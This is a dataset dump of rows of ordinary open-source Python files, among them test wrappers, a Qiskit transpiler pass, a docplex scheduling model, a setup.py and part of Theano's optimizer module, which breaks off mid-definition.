ext
stringclasses 9
values | sha
stringlengths 40
40
| content
stringlengths 3
1.04M
|
---|---|---|
py | 7dfcd8b7e61e1f90bc8d830b4835175742900bc1 | """Unit tests for the :mod:`networkx.generators.duplication` module.
"""
import pytest
from networkx.generators.tests.test_duplication import TestDuplicationDivergenceGraph
from networkx.generators.tests.test_duplication import TestPartialDuplicationGraph
from graphscope.nx.generators.duplication import duplication_divergence_graph
from graphscope.nx.generators.duplication import partial_duplication_graph
from graphscope.nx.utils.compat import with_graphscope_nx_context
@pytest.mark.usefixtures("graphscope_session")
@with_graphscope_nx_context(TestDuplicationDivergenceGraph)
class TestDuplicationDivergenceGraph:
pass
@pytest.mark.usefixtures("graphscope_session")
@with_graphscope_nx_context(TestPartialDuplicationGraph)
class TestPartialDuplicationGraph:
pass
|
py | 7dfcda9a499da2b71c881b7bde6767ce228d305e | #!/usr/bin/env python
#
# check.py : Run all the test cases.
#
# ====================================================================
# Copyright 2013 Justin Erenkrantz and Greg Stein
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ====================================================================
import sys
import glob
import subprocess
import os
if __name__ == '__main__':
# get the test directory from the commandline, if set.
if len(sys.argv) > 1:
testdir = sys.argv[1]
else:
testdir = 'test'
# define test executable paths
if sys.platform == 'win32':
SERF_RESPONSE_EXE = 'serf_response.exe'
TEST_ALL_EXE = 'test_all.exe'
else:
SERF_RESPONSE_EXE = 'serf_response'
TEST_ALL_EXE = 'test_all'
SERF_RESPONSE_EXE = os.path.join(testdir, SERF_RESPONSE_EXE)
TEST_ALL_EXE = os.path.join(testdir, TEST_ALL_EXE)
# Find test responses and run them one by one
for case in glob.glob(testdir + "/testcases/*.response"):
print "== Testing %s ==" % (case)
try:
subprocess.check_call([SERF_RESPONSE_EXE, case])
except subprocess.CalledProcessError:
print "ERROR: test case %s failed" % (case)
print "== Running the unit tests =="
try:
subprocess.check_call(TEST_ALL_EXE)
except subprocess.CalledProcessError:
print "ERROR: test(s) failed in test_all"
|
py | 7dfcdcdace441781663db13ce3b236c51f793610 | #!/usr/bin/env python
###############################################################################
# Copyright Kitware Inc. and Contributors
# Distributed under the Apache License, 2.0 (apache.org/licenses/LICENSE-2.0)
# See accompanying Copyright.txt and LICENSE files for details
###############################################################################
import numpy as np
import sys
from danesfield.geon_fitting.tensorflow import utils
import pickle
import plyfile
import gdal
import argparse
def get_theta(length, r):
if length < -0.8*r:
return np.pi
if length > 0.9*r:
return 0
if length < 0:
return np.pi-np.arccos((-1*length)/r)
return np.arccos(length/r)
def main(args):
parser = argparse.ArgumentParser()
parser.add_argument(
'--input_geon',
# default='../out_geon/D4_Curve_Geon.npy',
type=str,
help='input geon file.')
parser.add_argument(
'--input_dtm',
# default='/dvmm-filer2/projects/Core3D/D4_Jacksonville/DTMs/D4_DTM.tif',
type=str,
help='Input dtm') # D3_UCSD D4_Jacksonville
parser.add_argument(
'--output_mesh',
# default='../out_geon/D4_Curve_Mesh.ply',
type=str,
help='Output ply mesh file.')
parser.add_argument(
'--as-text',
action='store_true',
default=False,
help='Output ply as ASCII instead of binary')
args = parser.parse_args(args)
original_dtm = gdal.Open(args.input_dtm, gdal.GA_ReadOnly)
gt = original_dtm.GetGeoTransform() # captures origin and pixel size
left = gdal.ApplyGeoTransform(gt, 0, 0)[0]
top = gdal.ApplyGeoTransform(gt, 0, 0)[1]
right = gdal.ApplyGeoTransform(
gt, original_dtm.RasterXSize, original_dtm.RasterYSize)[0]
bottom = gdal.ApplyGeoTransform(
gt, original_dtm.RasterXSize, original_dtm.RasterYSize)[1]
dtm = original_dtm.ReadAsArray()
projection_model = {}
projection_model['corners'] = [left, top, right, bottom]
projection_model['project_model'] = gt
projection_model['scale'] = 1.0
geon_model = []
all_vertex = []
all_face = []
center_of_mess, geon_model = pickle.load(open(args.input_geon, "rb"))
for model in geon_model:
if model['name'] == 'poly_cylinder':
centroid, ex, ey, coefficients, min_axis_z,\
max_axis_z, ortho_x_min, ortho_x_max, fitted_indices_length, mean_diff = model[
'model']
vertex, face = utils.get_poly_ply_volume(dtm, projection_model, centroid, ex, ey,
coefficients, min_axis_z, max_axis_z,
ortho_x_min, ortho_x_max, len(all_vertex),
center_of_mess)
if len(all_vertex) > 0:
all_vertex.extend(vertex)
all_face.extend(face)
else:
all_vertex = vertex
all_face = face
elif model['name'] == 'sphere':
centroid, r, min_axis_z,\
max_axis_z, fitted_indices_length = model['model']
theta_max = get_theta(min_axis_z, r)
theta_min = get_theta(max_axis_z, r)
vertex, face = utils.get_sphere_volume(dtm, projection_model, centroid, r,
theta_min, theta_max, len(all_vertex),
center_of_mess)
if len(all_vertex) > 0:
all_vertex.extend(vertex)
all_face.extend(face)
else:
all_vertex = vertex
all_face = face
for idx in range(len(all_vertex)):
all_vertex[idx] = (all_vertex[idx][0]+center_of_mess[0],
all_vertex[idx][1]+center_of_mess[1],
all_vertex[idx][2]+center_of_mess[2])
all_vertex = np.array(
all_vertex, dtype=[('x', 'f4'), ('y', 'f4'), ('z', 'f4')])
all_face = np.array(all_face, dtype=[(
'vertex_indices', 'i4', (3,)), ('red', 'u1'), ('green', 'u1'), ('blue', 'u1')])
el_vertex = plyfile.PlyElement.describe(all_vertex, 'vertex')
el_face = plyfile.PlyElement.describe(all_face, 'face')
plyfile.PlyData([el_vertex, el_face],
text=args.as_text).write(args.output_mesh)
if __name__ == "__main__":
main(sys.argv[1:])
|
py | 7dfcdfd86698d12db59ae2053dbac584ae7fbdb3 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
from pulsar import Client, AuthenticationToken
client = Client(os.environ.get('SERVICE_URL'), authentication=AuthenticationToken(os.environ.get('AUTH_PARAMS')))
client.close()
|
py | 7dfcdfe137a9d5bc6919ebdee656b2d487126806 | import sys, argparse
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument("--seed", type=int, default=0, help="seed")
parser.add_argument("--render", action="store_true")
parser.add_argument("--dataset_folder", type=str, default="../input_data/robo", help="folder for bodies")
parser.add_argument("--train_bodies", type=str, default="", help="Format: --train_bodies=0,100,300")
parser.add_argument("--test_bodies", type=str, default="", help="Format: --test_bodies=0,100,300")
parser.add_argument("--robo_bodies", type=str, default="", help="RoboGrammar rules.")
parser.add_argument("--test_steps", type=int, default=1000, help="total time steps for testing.")
parser.add_argument("--train_steps", type=float, default=2e6, help="total time steps for training.")
parser.add_argument("--eval_steps", type=float, default=1e5, help="eval policy every # steps during training.")
parser.add_argument("--learning_rate", type=float, default=3e-5, help="Setting learning rate.")
parser.add_argument("--num_venvs", type=int, default=16, help="How many envs you want to vectorize (train together).")
parser.add_argument("--with_bodyinfo", action="store_true")
parser.add_argument("--stack_frames", type=int, default=1, help="How many frames do you want to stack for training and testing. ")
parser.add_argument("--vec_normalize", action="store_true", help="use VecNormalize")
parser.add_argument("--with_checkpoint", action="store_true", help="save checkpoints along training.")
parser.add_argument("--threshold_threshold", type=float, default=0.0, help="activation function used in training. 0.0 is equivalent to ReLU")
parser.add_argument("--threshold_value", type=float, default=0.0, help="activation function used in training. 0.0 is equivalent to ReLU")
parser.add_argument("--initialize_weights_from", type=str, default="", help="better initialization from model file.")
parser.add_argument("--model_filename", type=str, default="", help="model to test.")
parser.add_argument("--body_folder", type=str, default="../input_data/bodies", help="folders that contains body xml files")
parser.add_argument("--topology_wrapper", type=str, default="", help="Switch for different experiments. Could be: same|diff")
parser.add_argument("--wrapper_case", type=str, default="Walker2DHopperWrapper", help="special wrapper for different experiments.")
parser.add_argument("--realign_method", type=str, default="", help="Only works when --topologies=same. See exp_012's hypothesis. Could be: general_only|joints_only|feetcontact_only|...")
parser.add_argument("--custom_align_max_joints", type=int, default=10, help="For CustomAlignWrapper. 8 for Vanilla4, 10 for RandomBody.")
parser.add_argument("--custom_alignment", type=str, default="", help="For CustomAlignWrapper. e.g. '0,1,2;0,1,2;2,0,1;1,0,2' for 4 observations with size of 3. ")
# parser.add_argument("--misalign_obs", action="store_true", help="first misalignment test.")
# parser.add_argument("--random_align_obs", action="store_true", help="second misalignment test.")
# parser.add_argument("--preserve_header", action="store_true", help="preserve_header when misalign others")
parser.add_argument("--random_even_same_body", action="store_true", help="all training bodies have different orders in observation.")
# parser.add_argument("--preserve_feet_contact", action="store_true", help="preserve_feet_contact when misalign the rest (only obs of joints)")
parser.add_argument("--disable_reordering", action="store_true", help="For MutantWrapper, add this to disable reordering even when use MutantWrapper. So at test time, when rendering, we can see the coloring.")
parser.add_argument("--ga_job_id", type=int, default=-1, help="For GA, the individual id.")
parser.add_argument("--ga_parent_id", type=int, default=-1, help="For GA, the individual id.")
parser.add_argument("--pns", action="store_true", help="Use Mlp with PNS instead of MlpPolicy.")
parser.add_argument("--pns_init", action="store_true", help="By default, first 8 numbers in observation is general information. Init with an I matrix in sensor weight.")
parser.add_argument("--one_snapshot_at", type=int, default=-1, help="For save images, only save one picture at certain step.")
parser.add_argument("--skip_solved_threshold", type=float, default=-1, help="Define a value for solved, skip training on that body until everyone pass that threshold. -1 for disabling this function.")
parser.add_argument("-tb", "--tensorboard", type=str, default="tensorboard", help="Folder name for tensorboard data.")
if "/tests/test_" in sys.argv[0]: # hack: unittest from file, standalone
args = parser.parse_args(sys.argv[1:])
sys.argv = [sys.argv[0]]
if sys.argv[0]=="python -m unittest": # hack: unittest from command line
args = parser.parse_args([])
else:
args = parser.parse_args()
args.train_steps = int(args.train_steps)
args.train_bodies_str = args.train_bodies
args.train_bodies = str2array(args.train_bodies_str)
args.test_bodies_str = args.test_bodies
args.test_bodies = str2array(args.test_bodies_str)
args.robo_bodies_str = args.robo_bodies
args.robo_bodies = str2array(args.robo_bodies_str)
return args
def str2array(_str, separation=","):
assert isinstance(_str, str)
array = []
if len(_str) > 0:
array = [int(x) for x in _str.split(separation)]
return array
|
py | 7dfce01f39192d35a702d83d272c586666b50d39 | import torch
def ResNet18():
return torch.hub.load('pytorch/vision:v0.6.0', 'resnet18', pretrained=True) |
py | 7dfce0e5867c902726b245e812fa4188955938a8 | import numpy as np
class Normalizer(object):
def __init__(self, input_dims, init_mean, init_var,
scale_factor=1, epsilon=1e-3, clip_range=None, activated=False):
self.activated = activated
self.input_dims = input_dims
self.sample_count = 0
self.history = []
self.history_mean = init_mean
self.history_var = init_var
if self.history_mean is None:
self.history_mean = np.zeros(self.input_dims)
if self.history_var is None:
self.history_var = np.ones(self.input_dims)
assert self.history_mean.shape == (self.input_dims,)
assert self.history_var.shape == (self.input_dims,)
self.epsilon = epsilon*np.ones(self.input_dims)
if clip_range is None:
clip_range = 1e3
self.input_clip_range = (-clip_range*np.ones(self.input_dims), clip_range*np.ones(self.input_dims))
self.scale_factor = scale_factor
def store_history(self, *args):
self.history.append(*args)
# update mean and var for z-score normalization
def update_mean(self):
if len(self.history) == 0:
return
new_sample_num = len(self.history)
new_history = np.array(self.history, dtype=np.float)
new_mean = np.mean(new_history, axis=0)
new_var = np.sum(np.square(new_history - new_mean), axis=0)
new_var = (self.sample_count * np.square(self.history_var) + new_var)
new_var /= (new_sample_num + self.sample_count)
self.history_var = np.sqrt(new_var)
new_mean = (self.sample_count * self.history_mean + new_sample_num * new_mean)
new_mean /= (new_sample_num + self.sample_count)
self.history_mean = new_mean
self.sample_count += new_sample_num
self.history.clear()
# pre-process inputs, currently using max-min-normalization
def __call__(self, inputs):
if self.activated:
inputs = (inputs - self.history_mean) / (self.history_var+self.epsilon)
inputs = np.clip(inputs, self.input_clip_range[0], self.input_clip_range[1])
return self.scale_factor*inputs
|
py | 7dfce11a92e7691b17526ae51da326077fa8b70c | import numpy as np
import torch
import torch.nn as nn
from torch.autograd import Variable
from onnx2keras import onnx_to_keras, check_torch_keras_error
import onnx
class LayerTest(nn.Module):
def __init__(self, kernel_size=3, padding=1, stride=1):
super(LayerTest, self).__init__()
self.pool = nn.AvgPool3d(kernel_size=kernel_size, padding=padding, stride=stride)
def forward(self, x):
x = self.pool(x)
return x
if __name__ == '__main__':
max_error = 0
for kernel_size in [1, 3, 5, 7]:
for padding in [0, 1, 3]:
for stride in [1, 2, 3, 4]:
# RuntimeError: invalid argument 2: pad should be smaller than half of kernel size, but got padW = 1, padH = 1, kW = 1,
if padding > kernel_size / 2:
continue
model = LayerTest(kernel_size=kernel_size, padding=padding, stride=stride)
model.eval()
input_np = np.random.uniform(0, 1, (1, 3, 20, 224, 224))
input_var = Variable(torch.FloatTensor(input_np))
torch.onnx.export(model, input_var, "_tmpnet.onnx", verbose=True, input_names=['test_in'],
output_names=['test_out'])
onnx_model = onnx.load('_tmpnet.onnx')
k_model = onnx_to_keras(onnx_model, ['test_in'])
error = check_torch_keras_error(model, k_model, input_np)
print('Error:', error)
if max_error < error:
max_error = error
print('Max error: {0}'.format(max_error))
|
py | 7dfce1771b7bfa61f60f865baf11d7096f518e54 | #!/usr/bin/env python
"""
A setuptools based setup module.
See:
- https://packaging.python.org/en/latest/distributing.html
- https://github.com/pypa/sampleproject
To install:
1. Setup pypi by creating ~/.pypirc
[distutils]
index-servers =
pypi
pypitest
[pypi]
username=
password=
[pypitest]
username=
password=
2. Create the dist
python3 setup.py sdist bdist_wheel
3. Push
twine upload dist/*
"""
import os
import re
# Always prefer setuptools over distutils
from setuptools import setup, find_packages
ROOT = os.path.dirname(__file__)
def get_version():
"""
Reads the version from ersatz's __init__.py file.
We can't import the module because required modules may not
yet be installed.
"""
VERSION_RE = re.compile(r'''__version__ = ['"]([0-9.]+)['"]''')
init = open(os.path.join(ROOT, 'ersatz', '__init__.py')).read()
return VERSION_RE.search(init).group(1)
def get_description():
DESCRIPTION_RE = re.compile(r'''__description__ = ['"](.*)['"]''')
init = open(os.path.join(ROOT, 'ersatz', '__init__.py')).read()
return DESCRIPTION_RE.search(init).group(1)
setup(
name = 'ersatz',
# Versions should comply with PEP440. For a discussion on single-sourcing
# the version across setup.py and the project code, see
# https://packaging.python.org/en/latest/single_source_version.html
version = get_version(),
description = get_description(),
long_description = "Ersatz is a simple, language-agnostic toolkit for both training sentence segmentation models as well as providing pretrained, "
"high-performing models for sentence segmentation in a multilingual setting.",
# The project's main homepage.
url = 'https://github.com/rewicks/ersatz',
author = 'Rachel Wicks',
author_email='[email protected]',
maintainer_email='[email protected]',
license = 'Apache License 2.0',
python_requires = '>=3',
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers = [
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 5 - Production/Stable',
# Indicate who your project is intended for
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'Topic :: Scientific/Engineering',
'Topic :: Scientific/Engineering :: Artificial Intelligence',
'Topic :: Text Processing',
# Pick your license as you wish (should match "license" above)
'License :: OSI Approved :: Apache Software License',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
'Programming Language :: Python :: 3 :: Only',
],
# What does your project relate to?
keywords = ['sentence segmenation, data processing, preprocessing, evaluation, NLP, natural language processing, computational linguistics'],
# Which packages to deploy (currently sacrebleu, sacrebleu.matrics and sacrebleu.tokenizers)?
packages = find_packages(),
# Mark ersatz (and recursively all its sub-packages) as supporting mypy type hints (see PEP 561).
package_data={"ersatz": ["py.typed"]},
# List run-time dependencies here. These will be installed by pip when
# your project is installed. For an analysis of "install_requires" vs pip's
# requirements files see:
# https://packaging.python.org/en/latest/requirements.html
install_requires = [
'typing;python_version<"3.5"',
'torch==1.7.1',
'sentencepiece==0.1.95',
'tensorboard==2.4.1',
'progressbar2'
],
# List additional groups of dependencies here (e.g. development
# dependencies). You can install these using the following syntax,
# for example:
# $ pip install -e .[dev,test]
extras_require = {},
# To provide executable scripts, use entry points in preference to the
# "scripts" keyword. Entry points provide cross-platform support and allow
# pip to create the appropriate form of executable for the target platform.
entry_points={
'console_scripts': [
'ersatz = ersatz.split:main',
'ersatz_train = ersatz.trainer:main',
'ersatz_score = ersatz.score:main',
'ersatz_preprocess = ersatz.dataset:main'
],
},
)
|
py | 7dfce1cd5eb531e8eb235dbd1fa36bf32645fea7 | # This code is part of Qiskit.
#
# (C) Copyright IBM 2017, 2019.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Convert a circuit in ``U3, CX`` to ``Rx, Ry, Rxx`` without unrolling or simplification."""
import warnings
from qiskit.transpiler.basepasses import TransformationPass
from qiskit.exceptions import QiskitError
from qiskit.converters import circuit_to_dag
from qiskit.circuit.library.standard_gates import U3Gate, CXGate
from qiskit.transpiler.passes import Unroller
from qiskit.quantum_info.synthesis.one_qubit_decompose import OneQubitEulerDecomposer
from qiskit.quantum_info.synthesis.ion_decompose import cnot_rxx_decompose
class MSBasisDecomposer(TransformationPass):
"""Convert a circuit in ``U3, CX`` to ``Rx, Ry, Rxx`` without unrolling or simplification."""
supported_input_gates = (U3Gate, CXGate)
def __init__(self, basis_gates):
"""Deprecated
MSBasisDecomposer initializer.
Args:
basis_gates (list[str]): Target basis names, e.g. `['rx', 'ry', 'rxx', 'ms']` .
"""
warnings.warn(
"The qiskit.transpiler.passes.basis.MSBasisDecomposer class is "
"deprecated as of 0.16.0, and will be removed no earlier "
"than 3 months after that release date. You should use the "
"qiskit.transpiler.passes.basis.BasisTranslator class "
"instead.",
DeprecationWarning,
stacklevel=2,
)
super().__init__()
self.basis_gates = basis_gates
# Require all gates be unrolled to either a basis gate or U3,CX before
# running the decomposer.
input_basis = set(basis_gates).union(["u3", "cx"])
self.requires = [Unroller(list(input_basis))]
def run(self, dag):
"""Run the MSBasisDecomposer pass on `dag`.
Replace U3,CX nodes in input dag with equivalent Rx,Ry,Rxx gates.
Args:
dag(DAGCircuit): input dag
Raises:
QiskitError: if input dag includes gates outside U3,CX.
Returns:
DAGCircuit: output dag
"""
one_q_decomposer = OneQubitEulerDecomposer(basis="XYX")
cnot_decomposition = cnot_rxx_decompose()
for node in dag.op_nodes():
basic_insts = ["measure", "reset", "barrier", "snapshot", "delay"]
if node.name in basic_insts:
# TODO: this is legacy behavior. basic_insts should be removed and these
# instructions should be part of the device-reported basis. Currently, no
# backend reports "measure", for example.
continue
if node.name in self.basis_gates: # If already a base, ignore.
continue
if not isinstance(node.op, self.supported_input_gates):
raise QiskitError(
"Cannot convert the circuit to the given basis, %s. "
"No rule to expand instruction %s." % (str(self.basis_gates), node.op.name)
)
if isinstance(node.op, U3Gate):
replacement_circuit = one_q_decomposer(node.op)
elif isinstance(node.op, CXGate):
# N.B. We can't circuit_to_dag once outside the loop because
# substitute_node_with_dag will modify the input DAG if the
# node to be replaced is conditional.
replacement_circuit = cnot_decomposition
else:
raise QiskitError(
"Unable to handle instruction (%s, %s)." % (node.op.name, type(node.op))
)
replacement_dag = circuit_to_dag(replacement_circuit)
# N.B. wires kwarg can be omitted for both 1Q and 2Q substitutions.
# For 1Q, one-to-one mapping is always correct. For 2Q,
# cnot_rxx_decompose follows convention of control as q[0], target
# as q[1], which matches qarg order in CX node.
dag.substitute_node_with_dag(node, replacement_dag)
return dag
|
py | 7dfce2960b8fad0e6d21f9985f189326c80e1444 | # --------------------------------------------------------------------------
# Source file provided under Apache License, Version 2.0, January 2004,
# http://www.apache.org/licenses/
# (c) Copyright IBM Corp. 2015, 2016
# --------------------------------------------------------------------------
"""
This problem can be described as follows: a finite set of operations has to be
processed on a given set of machines.
Each operation has a specific processing time during which it may not be interrupted.
Operations are grouped in jobs, so that each operation belongs to exactly one job.
Furthermore, each operation requires exactly one machine for processing.
The objective of the problem is to schedule all operations, i.e., to determine
their start time, so as to minimize the maximum completion time (makespan)
given the additional constraints that: operations which belong to the same job and
operations which use the same machine cannot be processed simultaneously.
This problem is similar that the one proposed in flow_shop.py except that
job operations can be executed in any order.
Please refer to documentation for appropriate setup of solving configuration.
"""
from docplex.cp.model import *
import os
#-----------------------------------------------------------------------------
# Initialize the problem data
#-----------------------------------------------------------------------------
# Read the input data file.
# Available files are openshop_default, and different openshop_XXXX.
# First line contains the number of jobs, and the number of machines.
# The rest of the file consists of one line per job that contains the list of
# operations given as durations for each machines.
filename = os.path.dirname(os.path.abspath(__file__)) + '/data/openshop_default.data'
with open(filename, 'r') as file:
NB_JOBS, NB_MACHINES = [int(v) for v in file.readline().split()]
JOB_DURATIONS = [[int(v) for v in file.readline().split()] for i in range(NB_JOBS)]
#-----------------------------------------------------------------------------
# Build the model
#-----------------------------------------------------------------------------
# Create model
mdl = CpoModel()
# Create one interval variable per job operation
job_operations = [[interval_var(size=JOB_DURATIONS[j][m], name='J{}-M{}'.format(j,m)) for m in range(NB_MACHINES)] for j in range(NB_JOBS)]
# All operations executed on the same machine must no overlap
mdl.add(no_overlap(job_operations[i][j] for j in range(NB_MACHINES)) for i in range(NB_JOBS))
# All operations executed for the same job must no overlap
mdl.add(no_overlap(job_operations[i][j] for i in range(NB_JOBS)) for j in range(NB_MACHINES))
# Minimization completion time
mdl.add(minimize(max(end_of(job_operations[i][j]) for i in range(NB_JOBS) for j in range(NB_MACHINES))))
#-----------------------------------------------------------------------------
# Solve the model and display the result
#-----------------------------------------------------------------------------
# Solve model
print('Solving model...')
res = mdl.solve(FailLimit=10000,TimeLimit=10)
print('Solution: ')
res.print_solution()
# Display solution
import docplex.cp.utils_visu as visu
if res and visu.is_visu_enabled():
visu.timeline('Solution for open-shop ' + filename)
visu.panel('Jobs')
for i in range(NB_JOBS):
visu.sequence(name='J' + str(i),
intervals=[(res.get_var_solution(job_operations[i][j]), j, 'M' + str(j)) for j in range(NB_MACHINES)])
visu.panel('Machines')
for j in range(NB_MACHINES):
visu.sequence(name='M' + str(j),
intervals=[(res.get_var_solution(job_operations[i][j]), j, 'J' + str(i)) for i in range(NB_JOBS)])
visu.show()
|
py | 7dfce29da8239f717e6e8c2fe66fc89c67a5e702 | import time
from unittest import TestCase
from nose import SkipTest
import pyelasticsearch
from elasticutils import get_es, S
class ElasticTestCase(TestCase):
"""Superclass for ElasticSearch-using test cases.
:cvar index_name: string; name of the index to use
:cvar skip_tests: bool; if ElasticSearch isn't available, then
this is True and therefore tests should be skipped for this
class
For examples of usage, see the other ``test_*.py`` files.
"""
index_name = 'elasticutilstest'
mapping_type_name = 'elasticutilsmappingtype'
es_settings = {
'urls': ['http://localhost:9200']
}
skip_tests = False
@classmethod
def setup_class(cls):
"""Class setup for tests.
Checks to see if ES is running and if not, sets ``skip_test``
to True on the class.
"""
# Note: TestCase has no setup_class
try:
get_es().health()
except pyelasticsearch.exceptions.ConnectionError:
cls.skip_tests = True
@classmethod
def teardown_class(cls):
"""Class tear down for tests."""
if cls.skip_tests:
return
cls.cleanup_index()
def setUp(self):
"""Set up a single test.
:raises SkipTest: if ``skip_tests`` is True for this
class/instance
"""
if self.skip_tests:
raise SkipTest
super(ElasticTestCase, self).setUp()
@classmethod
def get_es(cls):
return get_es(**cls.es_settings)
@classmethod
def get_s(cls, mapping_type=None):
if mapping_type is not None:
s = S(mapping_type)
else:
s = S()
return (s.es(**cls.es_settings)
.indexes(cls.index_name)
.doctypes(cls.mapping_type_name))
@classmethod
def create_index(cls):
es = cls.get_es()
try:
es.delete_index(cls.index_name)
except pyelasticsearch.exceptions.ElasticHttpNotFoundError:
pass
es.create_index(cls.index_name)
@classmethod
def index_data(cls, data, index=None, doctype=None, create_index=False):
index = index or cls.index_name
doctype = doctype or cls.mapping_type_name
es = cls.get_es()
if create_index:
cls.create_index()
# TODO: change this to a bulk index
for item in data:
es.index(index, doctype, item, id=item['id'])
cls.refresh()
@classmethod
def cleanup_index(cls):
es = cls.get_es()
try:
es.delete_index(cls.index_name)
except pyelasticsearch.exceptions.ElasticHttpNotFoundError:
pass
@classmethod
def refresh(cls, timesleep=0):
"""Refresh index after indexing.
This refreshes the index specified by `self.index_name`.
:arg timesleep: int; number of seconds to sleep after telling
ElasticSearch to refresh
"""
cls.get_es().refresh(cls.index_name)
if timesleep:
time.sleep(timesleep)
def facet_counts_dict(qs, field):
return dict((t['term'], t['count']) for t in qs.facet_counts()[field])
|
py | 7dfce3cf045c5d2bbac9718dbd41e5afa3c380ac | """
Defines the base class for optimizations as well as a certain
amount of useful generic optimization tools.
"""
import copy
import logging
import sys
import time
import numpy
import graph
from fg import InconsistencyError
import op
import utils
import unify
import toolbox
import theano
from theano import config
from theano.gof.python25 import any, all, deque
from theano.configparser import AddConfigVar, BoolParam
#if sys.version_info[:2] >= (2,5):
# from collections import defaultdict
_logger = logging.getLogger('theano.gof.opt')
AddConfigVar('time_seq_optimizer',
"Should SeqOptimizer print the time taked by each of its optimizer",
BoolParam(False),
in_c_key=False)
AddConfigVar('time_eq_optimizer',
"Should EquilibriumOptimizer print the time taken by each optimizer",
BoolParam(False),
in_c_key=False)
import destroyhandler as dh
import traceback
_optimizer_idx = [0]
def _list_of_nodes(fgraph):
return list(graph.io_toposort(fgraph.inputs, fgraph.outputs))
class Optimizer(object):
"""WRITEME
An L{Optimizer} can be applied to an L{FunctionGraph} to transform it.
It can represent an optimization or in general any kind
of transformation you could apply to an L{FunctionGraph}.
"""
def __hash__(self):
if not hasattr(self, '_optimizer_idx'):
self._optimizer_idx = _optimizer_idx[0]
_optimizer_idx[0] += 1
return self._optimizer_idx
def apply(self, fgraph):
"""WRITEME
Applies the optimization to the provided L{FunctionGraph}. It may use all
the methods defined by the L{FunctionGraph}. If the L{Optimizer} needs
to use a certain tool, such as an L{InstanceFinder}, it can do
so in its L{add_requirements} method.
"""
pass
def optimize(self, fgraph, *args, **kwargs):
"""WRITEME
This is meant as a shortcut to::
opt.add_requirements(fgraph)
opt.apply(fgraph)
"""
self.add_requirements(fgraph)
return self.apply(fgraph, *args, **kwargs)
def __call__(self, fgraph):
"""WRITEME
Same as self.optimize(fgraph)
"""
return self.optimize(fgraph)
def add_requirements(self, fgraph):
"""WRITEME
Add features to the fgraph that are required to apply the optimization.
For example:
fgraph.attach_feature(History())
fgraph.attach_feature(MyFeature())
etc.
"""
pass
def print_summary(self, stream=sys.stdout, level=0, depth=-1):
name = getattr(self, 'name', None)
print >> stream, "%s%s %s id=%i" % (
(' ' * level), self.__class__.__name__, name, id(self))
def print_profile(self, prof):
if prof is not None:
raise NotImplementedError(
"The function print_profile must be overrided if the"
" optimizer return profiling information.")
class FromFunctionOptimizer(Optimizer):
"""WRITEME"""
def __init__(self, fn):
self.apply = fn
def add_requirements(self, fgraph):
# Added by default
#fgraph.attach_feature(toolbox.ReplaceValidate())
pass
def print_summary(self, stream=sys.stdout, level=0, depth=-1):
print >> stream, "%s%s id=%i" % (
' ' * level,
str(self.apply),
id(self))
def __call__(self, *args, **kwargs):
return self.fn(*args, **kwargs)
def optimizer(f):
"""decorator for FromFunctionOptimizer"""
rval = FromFunctionOptimizer(f)
rval.__name__ = f.__name__
return rval
class SeqOptimizer(Optimizer, list):
#inherit from Optimizer first to get Optimizer.__hash__
"""WRITEME
Takes a list of L{Optimizer} instances and applies them
sequentially.
"""
@staticmethod
def warn(exc, self, optimizer):
"""Default failure_callback for SeqOptimizer
"""
_logger.error("SeqOptimizer apply %s" % str(optimizer))
_logger.error("Traceback:")
_logger.error(traceback.format_exc())
if config.on_opt_error == 'raise':
raise exc
def __init__(self, *opts, **kw):
"""WRITEME"""
if len(opts) == 1 and isinstance(opts[0], (list, tuple)):
opts = opts[0]
self[:] = opts
self.failure_callback = kw.pop('failure_callback', None)
def apply(self, fgraph):
"""WRITEME
Applies each L{Optimizer} in self in turn.
"""
l = []
if fgraph.profile:
validate_before = fgraph.profile.validate_time
nb_node_before = len(fgraph.apply_nodes)
sub_profs = []
for optimizer in self:
try:
t0 = time.time()
sub_prof = optimizer.optimize(fgraph)
l.append(float(time.time() - t0))
sub_profs.append(sub_prof)
except AssertionError:
# do not catch Assertion failures
raise
except Exception, e:
if self.failure_callback:
self.failure_callback(e, self, optimizer)
continue
else:
raise
if config.time_seq_optimizer:
print "SeqOptimizer",
if hasattr(self,"name"): print self.name,
elif hasattr(self,"__name__"): print self.__name__,
print " time %.3fs for %d/%d nodes before/after optimization"%(sum(l),nb_node_before,len(fgraph.apply_nodes))
print " time %.3fs for validate " % (
fgraph.profile.validate_time - validate_before)
ll=[]
for opt in self:
if hasattr(opt,"__name__"):
ll.append((opt.__name__,opt.__class__.__name__))
else:
ll.append((opt.name,opt.__class__.__name__))
lll=zip(l,ll)
def cmp(a,b):
if a[0]==b[0]: return 0
if a[0]<b[0]: return -1
return 1
lll.sort(cmp)
for (t, opt) in lll[::-1]:
print ' %.6fs - %s' % (t, opt)
print
if fgraph.profile:
validate_time = fgraph.profile.validate_time - validate_before
else:
validate_time = None
return (self, l, validate_time, nb_node_before,
len(fgraph.apply_nodes), sub_profs)
def __eq__(self, other):
#added to override the list's __eq__ implementation
return id(self) == id(other)
def __neq__(self, other):
#added to override the list's __neq__ implementation
